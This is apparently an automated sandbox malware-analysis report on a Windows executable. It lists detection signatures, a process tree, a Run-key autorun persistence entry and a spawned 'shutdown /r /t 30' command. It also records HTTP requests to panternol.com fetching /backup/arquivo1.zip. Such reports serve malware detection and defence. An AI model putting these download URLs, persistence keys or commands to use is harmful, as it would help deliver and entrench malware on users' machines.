Edit tour

Windows Analysis Report
leg#U00edvel9931-009-140.08372236.exe

Overview

General Information

Sample name:	leg#U00edvel9931-009-140.08372236.exe renamed because original name is a hash value
Original sample name:	legvel9931-009-140.08372236.exe
Analysis ID:	1562226
MD5:	f8720f77959acda03bd5b2b4a3698848
SHA1:	1ea4f348e20d35774a7db6a89c3d8fc274a9892b
SHA256:	a8ba8a7be8a404f6398c3b3d5a3788f9e513210d0732fd5b0ffebc44af58de8b
Tags:	exeuser-Porcupine
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Uses shutdown.exe to shutdown or reboot the system

Abnormal high CPU Usage

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Execution of Shutdown

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

leg#U00edvel9931-009-140.08372236.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe" MD5: F8720F77959ACDA03BD5B2B4A3698848)

shutdown.exe (PID: 6540 cmdline: shutdown /r /t 30 MD5: F2A4E18DA72BB2C5B21076A5DE382A20)

conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8pIuMUYQX9q.exe (PID: 2056 cmdline: "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe" MD5: CCCA2C0E6653506652437868D1049817)

8pIuMUYQX9q.exe (PID: 2124 cmdline: "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe" MD5: CCCA2C0E6653506652437868D1049817)

cleanup

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe, ProcessId: 7120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ng3DJyCjjqIdyv

Sigma detected: Suspicious Execution of Shutdown

Source: Process started

Author: frack113: Data: Command: shutdown /r /t 30, CommandLine: shutdown /r /t 30, CommandLine|base64offset|contains: v', Image: C:\Windows\System32\shutdown.exe, NewProcessName: C:\Windows\System32\shutdown.exe, OriginalFileName: C:\Windows\System32\shutdown.exe, ParentCommandLine: "C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe", ParentImage: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe, ParentProcessId: 7120, ParentProcessName: leg#U00edvel9931-009-140.08372236.exe, ProcessCommandLine: shutdown /r /t 30, ProcessId: 6540, ProcessName: shutdown.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: leg#U00edvel9931-009-140.08372236.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000D4B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		6_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000D4B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,		7_2_000000018000D4B0

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr
Source:	Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A528EDC FindFirstFileExW,	6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055750 FindFirstFileExW,	6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055750 FindFirstFileExW,	7_2_0000000180055750

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180013480 WSAStartup,GdiplusStartup,_Thrd_detach,Sleep,GetDesktopWindow,GetWindowRect,MagSetWindowSource,RedrawWindow,GdipCreateBitmapFromScan0,CLSIDFromString,CreateStreamOnHGlobal,GdipSaveImageToStream,GdipDisposeImage,send,send,closesocket,recv,closesocket,Sleep,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

6_2_0000000180013480

Source: global traffic	HTTP traffic detected: GET /backup/arquivo1.zip HTTP/1.1Host: panternol.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cacher/ HTTP/1.1Host: panternol.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: global traffic

DNS traffic detected: DNS query: panternol.com

Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145409860.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146358786.0000000002220000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145308802.0000000001398000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145573879.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145788826.0000000180064000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll1.3.1rbr
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://GODEBUGhttps://panterno1.1.1.1
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C00008A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panterno1.1.1.1
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/backup/arqR
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C0000A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/backup/arqREQUEST_METHODpanternol.comiphlpapi.dll
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000090000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/backup/arquivo1.zip
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/cacher/
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1981857921.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://panternol.com/cacher/https://panternol.com/cacher/panternol.com
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp, leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp, ClassicIE_64.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180006010 GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,ReleaseDC,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,CreateStreamOnHGlobal,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToStream,DeleteObject,DeleteDC,ReleaseDC,DeleteObject,DeleteDC,ReleaseDC,GdipDisposeImage,

6_2_0000000180006010

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A7B4C	6_2_00007FF6B40A7B4C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A87A8	6_2_00007FF6B40A87A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A4E08	6_2_00007FF6B40A4E08
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A1000	6_2_00007FF6B40A1000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A5E54	6_2_00007FF6B40A5E54
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A3C74	6_2_00007FF6B40A3C74
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A530948	6_2_00007FFE1A530948
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A511800	6_2_00007FFE1A511800
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A513480	6_2_00007FFE1A513480
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A512DF0	6_2_00007FFE1A512DF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A5302AC	6_2_00007FFE1A5302AC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52CA60	6_2_00007FFE1A52CA60
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A521B00	6_2_00007FFE1A521B00
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52B308	6_2_00007FFE1A52B308
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A523F10	6_2_00007FFE1A523F10
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A528EDC	6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A521FDC	6_2_00007FFE1A521FDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A521470	6_2_00007FFE1A521470
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52DCD8	6_2_00007FFE1A52DCD8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A52BDB4	6_2_00007FFE1A52BDB4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800170A0	6_2_00000001800170A0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180013480	6_2_0000000180013480
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000E860	6_2_000000018000E860
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800059D0	6_2_00000001800059D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180006010	6_2_0000000180006010
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018005C044	6_2_000000018005C044
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002C050	6_2_000000018002C050
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002C080	6_2_000000018002C080
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004C16C	6_2_000000018004C16C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800231C0	6_2_00000001800231C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800501D8	6_2_00000001800501D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018005A204	6_2_000000018005A204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180042204	6_2_0000000180042204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002F240	6_2_000000018002F240
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180040254	6_2_0000000180040254
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800502BC	6_2_00000001800502BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800282E0	6_2_00000001800282E0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180006380	6_2_0000000180006380
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800243C0	6_2_00000001800243C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800233F0	6_2_00000001800233F0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000F430	6_2_000000018000F430
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000D4B0	6_2_000000018000D4B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800404D8	6_2_00000001800404D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004E52C	6_2_000000018004E52C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055544	6_2_0000000180055544
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180050550	6_2_0000000180050550
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180022570	6_2_0000000180022570
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004A594	6_2_000000018004A594
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800305D0	6_2_00000001800305D0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180034610	6_2_0000000180034610
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180024650	6_2_0000000180024650
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800456BC	6_2_00000001800456BC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055750	6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004B760	6_2_000000018004B760
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180046850	6_2_0000000180046850
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180024920	6_2_0000000180024920
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800569C8	6_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180045A68	6_2_0000000180045A68
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180051B00	6_2_0000000180051B00
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180057BA8	6_2_0000000180057BA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180023BF0	6_2_0000000180023BF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180054C70	6_2_0000000180054C70
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018004CC9C	6_2_000000018004CC9C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018000FCA0	6_2_000000018000FCA0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180026CE0	6_2_0000000180026CE0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00000001800569C8	6_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018001AD30	6_2_000000018001AD30
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180046D5C	6_2_0000000180046D5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018001DE80	6_2_000000018001DE80
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002AE90	6_2_000000018002AE90
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018002CEC0	6_2_000000018002CEC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180011EC0	6_2_0000000180011EC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180058F58	6_2_0000000180058F58
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180006FB0	6_2_0000000180006FB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180023FC0	6_2_0000000180023FC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800170A0	7_2_00000001800170A0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180006010	7_2_0000000180006010
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018005C044	7_2_000000018005C044
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002C050	7_2_000000018002C050
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002C080	7_2_000000018002C080
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004C16C	7_2_000000018004C16C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800231C0	7_2_00000001800231C0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800501D8	7_2_00000001800501D8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018005A204	7_2_000000018005A204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180042204	7_2_0000000180042204
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002F240	7_2_000000018002F240
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180040254	7_2_0000000180040254
